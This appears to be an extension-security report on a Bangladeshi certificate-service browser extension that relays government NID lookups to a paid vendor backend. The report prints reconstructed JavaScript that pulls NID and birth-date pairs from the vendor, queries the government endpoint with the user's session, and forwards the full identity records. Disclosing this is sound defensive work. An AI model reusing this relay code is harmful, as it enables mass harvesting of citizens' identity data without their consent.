Is সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় safe?
This extension looks up Bangladesh government NID records on dwavwb.gov.bd and forwards the results to its own paid backend.
On the government's dwavwb.gov.bd certificate site, the extension injects a panel that queries a queue of NID (national ID) and date-of-birth pairs from the vendor's own backend, then uses the visitor's logged-in government session to look each one up against the official NID verification endpoint. The returned identity record is sent to the vendor's server (api.rajabariup.gov.bd) rather than staying on government infrastructure or the local device, and this lookup capability is metered behind a paid account balance.
Who publishes itSeba Automation - 2 other listings from the same operator, 2 of them carrying a finding
Seba Automation - 2 other listings from the same operator, 2 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
2 other listings published from this account, 2k+ users between them. 2 of them carry a finding.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Extension relays Bangladesh govt NID lookups to a paid vendor backend
Code analysis shows a content script queries Bangladesh's official NID verification site for citizens queued by the vendor, then forwards the full government record to the vendor's own paid backend.
You click Verify in the panel the extension injects on a Bangladesh government VGD application page.
It fetches queued NID and DOB pairs from the vendor's server, looks each up on the government's own endpoint, then sends the answer to the vendor's paid backend.
| Field | Value | Why it matters | |
|---|---|---|---|
National ID number | 1994847583920 | Bangladesh's national identity number for the citizen being looked up. | |
Date of birth | 1994-03-12 | Paired with the NID to run the lookup and match the government's record. | |
Full government NID record | (illustrative) {"name":"Rahim Uddin","dob":"1994-03-12","address":"Rajshahi"} | The citizen's identity data the government returns, forwarded whole to the vendor's server. | |
Applicant record ID | 8821 | An internal ID from the vendor's queue tying the lookup to one applicant. |
The queue-fetch and NID-lookup-relay functions
// eb(): pull the queue of NID+DOB pairs awaiting lookup
const fetchUnverifiedQueue = async () => {
const records = await callApiWithAuth(
"https://api.rajabariup.gov.bd/api/auth/dwavwb/unverified", "GET"
);
for (const record of records) {
if (record.id && record.identificationNumber && record.date_of_birth) {
await lookupAndRelay(record);
await sleep(2000); // 2s throttle between lookups
}
}
};// ey(): look up one NID+DOB pair on the government's own endpoint,
// then forward the full government response to the vendor's backend
const lookupAndRelay = async (record) => {
const govUrl = `https://dwavwb.gov.bd/icvgd/get-nid-data?nid=${record.identificationNumber}&dob=${record.date_of_birth}`;
const govResponse = await fetch(govUrl, { method: "GET" });
const govData = await govResponse.json();
if (govData && govData.nidData) {
await callApiWithAuth(
`https://api.rajabariup.gov.bd/api/auth/dwavwb/verify/${record.id}`,
"POST",
{ payload: govData.nidData, id: record.id },
{ "X-Submission-Type": "vgd-form" }
);
}
};- dwavwb.gov.bd
Official Bangladesh government NID verification site, queried using your own logged-in session; not operated by this extension's vendor.
- api.rajabariup.gov.bd
The extension vendor's own paid backend. Supplies the NID+DOB queue and receives the government's full identity record, gated behind a metered account balance.
The NID and DOB pairs looked up come from the vendor's own queue, not typed by this extension's user, who cannot see or limit which citizens are queried. This may reflect a local digital-service-center business model with consent.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
What it can do
Permissions this extension asks for, as declared in version 0.0.20. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Read and change your data on every site you visit
*://*/*
Store data in your browser
storage
See the address and title of every tab you have open
tabs
Act on the current tab, but only after you click the extension
activeTab
Run its own code inside the pages you visit
scripting
Where it sends data
Destinations our analysis observed সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- api.rajabariup.gov.bd
সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় sends data to api.rajabariup.gov.bd. No other extension we have analysed sends data here.